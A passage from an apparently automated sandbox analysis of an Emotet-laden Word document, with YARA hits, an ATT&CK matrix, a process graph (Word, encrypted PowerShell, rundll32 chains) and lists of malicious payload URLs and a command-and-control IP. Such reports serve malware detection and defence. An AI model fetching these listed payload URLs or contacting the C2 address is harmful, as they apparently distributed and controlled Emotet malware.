                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000009.00000002.2125452150.0000000000690000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2188345600.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2207082899.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2149603848.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2187673787.0000000000150000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2207752996.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2125404655.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2176671171.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2339396360.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2107659481.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2158799762.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2115709278.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2197495102.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2226062410.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2176658564.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2207040108.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2138353893.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2166530116.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2147996106.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2148213455.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2135403936.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2218991532.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2119181462.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2217422949.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2180490151.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2166511135.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2341403788.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2339372095.0000000000150000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2157690183.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2107638490.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2217659193.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2126211663.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2226800833.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2108176213.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2199714499.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2197524650.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2226045292.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2135436680.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2167094683.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2187719578.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2115685260.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2157667927.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 9.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.690000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.690000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.230000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Masquerading11OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter211Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsScripting22Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection111NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol4SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell2Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol15Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonScripting22Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information111Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 343551 Sample: 79a2gzs3gkk.doc Startdate: 24/01/2021 Architecture: WINDOWS Score: 100 64 Multi AV Scanner detection for domain / URL 2->64 66 Antivirus detection for URL or domain 2->66 68 Multi AV Scanner detection for submitted file 2->68 70 12 other signatures 2->70 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 26 2->17         started        process3 signatures4 80 Suspicious powershell command line found 14->80 82 Very long command line found 14->82 84 Encrypted powershell cmdline option found 14->84 19 powershell.exe 12 9 14->19         started        23 msg.exe 14->23         started        process5 dnsIp6 54 bimception.com 162.241.224.176, 443, 49169, 49170 UNIFIEDLAYER-AS-1US United States 19->54 56 bbjugueteria.com 162.241.60.240, 443, 49167, 49168 UNIFIEDLAYER-AS-1US United States 19->56 58 5 other IPs or domains 19->58 52 C:\Users\user\Snuvw2w\V4651pz\H64C.dll, data 19->52 dropped 25 rundll32.exe 19->25         started        27 rundll32.exe 23->27         started        file7 process8 signatures9 30 rundll32.exe 25->30         started        78 Hides that the sample has been downloaded from the Internet (zone.identifier) 27->78 32 rundll32.exe 27->32         started        process10 process11 34 rundll32.exe 2 30->34         started        37 rundll32.exe 32->37         started        dnsIp12 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 34->72 40 rundll32.exe 34->40         started        60 69.38.130.14, 80 TWRS-NYCUS United States 37->60 62 195.159.28.230, 49174, 8080 ASN-CATCHCOMNO Norway 37->62 74 System process connects to network (likely due to code injection or exploit) 37->74 signatures13 process14 process15 42 rundll32.exe 1 40->42         started        signatures16 76 Hides that the sample has been downloaded from the Internet (zone.identifier) 42->76 45 rundll32.exe 42->45         started        process17 process18 47 rundll32.exe 1 45->47         started        signatures19 86 Hides that the sample has been downloaded from the Internet (zone.identifier) 47->86 50 rundll32.exe 47->50         started        process20

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      79a2gzs3gkk.doc57%VirustotalBrowse
                      79a2gzs3gkk.doc35%MetadefenderBrowse
                      79a2gzs3gkk.doc66%ReversingLabsDocument-Word.Trojan.Emotet

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      18.2.rundll32.exe.1d0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      18.2.rundll32.exe.1f0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.210000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.230000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.1f0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      19.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.690000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.290000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      19.2.rundll32.exe.1f0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.210000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      19.2.rundll32.exe.1d0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.240000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.1f0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.1a0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      20.2.rundll32.exe.1d0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      15.2.rundll32.exe.1c0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      17.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.250000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      20.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      18.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      17.2.rundll32.exe.260000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.210000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      15.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      silkonbusiness.matrixinfotechsolution.com5%VirustotalBrowse
                      armakonarms.com7%VirustotalBrowse
                      bimception.com2%VirustotalBrowse
                      alugrama.com.mx2%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://www.bimception.com0%Avira URL Cloudsafe
                      http://armakonarms.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve100%Avira URL Cloudmalware
                      https://bbjugueteria.com/s6kscx/Z/100%Avira URL Cloudmalware
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=4.9100%Avira URL Cloudmalware
                      https://bbjugueteria.comh0%Avira URL Cloudsafe
                      http://coworkingplus.es/wp-admin/FxmME/100%Avira URL Cloudmalware
                      http://armakonarms.com/wp-includes/fz/100%Avira URL Cloudmalware
                      http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.9.1100%Avira URL Cloudmalware
                      https://armakonarms.com/wp-content/uploads/2020/11/winmark.png100%Avira URL Cloudmalware
                      http://www.piriform.c3#0%Avira URL Cloudsafe
                      http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js100%Avira URL Cloudmalware
                      https://armakonarms.com/brands/100%Avira URL Cloudmalware
                      https://armakonarms.com/iletisim/100%Avira URL Cloudmalware
                      http://armakonarms.com/wp-includes/wlwmanifest.xml100%Avira URL Cloudmalware
                      http://armakonarms.com100%Avira URL Cloudmalware
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://silkonbusiness.matrixinfotechsolu0%Avira URL Cloudsafe
                      https://armakonarms.com/comments/feed/100%Avira URL Cloudmalware
                      http://silkonbusiness.matrixinfotechsolution.com100%Avira URL Cloudmalware
                      https://armakonarms.com/wp-content/uploads/2020/11/winmark-100x100.png100%Avira URL Cloudmalware
                      http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=4.9.100%Avira URL Cloudmalware
                      http://homecass.com/wp-content/iF/P100%Avira URL Cloudmalware
                      https://armakonarms.com/urun-kategori/pump-action-2/100%Avira URL Cloudmalware
                      http://homecass.com/wp-content/iF/100%Avira URL Cloudmalware
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=4.9.100%Avira URL Cloudmalware
                      http://armakonarms.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2100%Avira URL Cloudmalware
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://armakonarms.com/wp-includes/js/wp-embed.min.js?ver=5.6100%Avira URL Cloudmalware
                      http://alugrama.com.mx0%Avira URL Cloudsafe
                      https://armakonarms.com/urun-kategori/short-pump-action/100%Avira URL Cloudmalware
                      https://armakonarms.com/feed/100%Avira URL Cloudmalware
                      http://armakonarms.com/wp-content/themes/neve/assets/css/woocommerce.min.css?ver=2.10.0100%Avira URL Cloudmalware
                      https://www.bimception.comhrsZ0%Avira URL Cloudsafe
                      https://armakonarms.com/wp-json/100%Avira URL Cloudmalware
                      http://coworkingplus.es100%Avira URL Cloudmalware
                      https://armakonarms.com/urun-kategori/semi-auto/100%Avira URL Cloudmalware
                      http://armakonarms.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1100%Avira URL Cloudmalware
                      https://armakonarms.com/100%Avira URL Cloudmalware
                      https://www.bimception.com/wp-admin/sHy5t/100%Avira URL Cloudmalware
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      https://armakonarms.com/wp-content/uploads/2021/01/armakon.png100%Avira URL Cloudmalware
                      http://silkonbusiness.matrixinfotechsolution.com/js/q26/100%Avira URL Cloudmalware
                      http://armakonarms.com/wp-content/themes/neve/style.min.css?ver=2.10.0100%Avira URL Cloudmalware
                      http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4100%Avira URL Cloudmalware
                      http://armakonarms.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6100%Avira URL Cloudmalware
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://armakonarms.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl100%Avira URL Cloudmalware
                      https://armakonarms.com/xmlrpc.php?rsd100%Avira URL Cloudmalware
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      https://bbjugueteria.com0%Avira URL Cloudsafe
                      http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.9.1100%Avira URL Cloudmalware
                      http://195.159.28.230:8080/qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/0%Avira URL Cloudsafe
                      http://armakonarms.com/wp-content/themes/neve/assets/js/build/modern/frontend.js?ver=2.10.0100%Avira URL Cloudmalware
                      http://alugrama.com.mx/t/2/100%Avira URL Cloudmalware
                      http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=4100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      silkonbusiness.matrixinfotechsolution.com
                      		166.62.10.32
                      		truetrueunknown
                      armakonarms.com
                      		45.143.97.183
                      		truetrueunknown
                      bimception.com
                      		162.241.224.176
                      		truetrueunknown
                      alugrama.com.mx
                      		162.241.61.203
                      		truetrueunknown
                      coworkingplus.es
                      		104.21.89.78
                      		truetrue
                        		unknown
                        bbjugueteria.com
                        		162.241.60.240
                        		truetrue
                          		unknown
                          www.bimception.com
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://coworkingplus.es/wp-admin/FxmME/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://armakonarms.com/wp-includes/fz/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://silkonbusiness.matrixinfotechsolution.com/js/q26/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://195.159.28.230:8080/qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://alugrama.com.mx/t/2/true
                            • Avira URL Cloud: malware
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
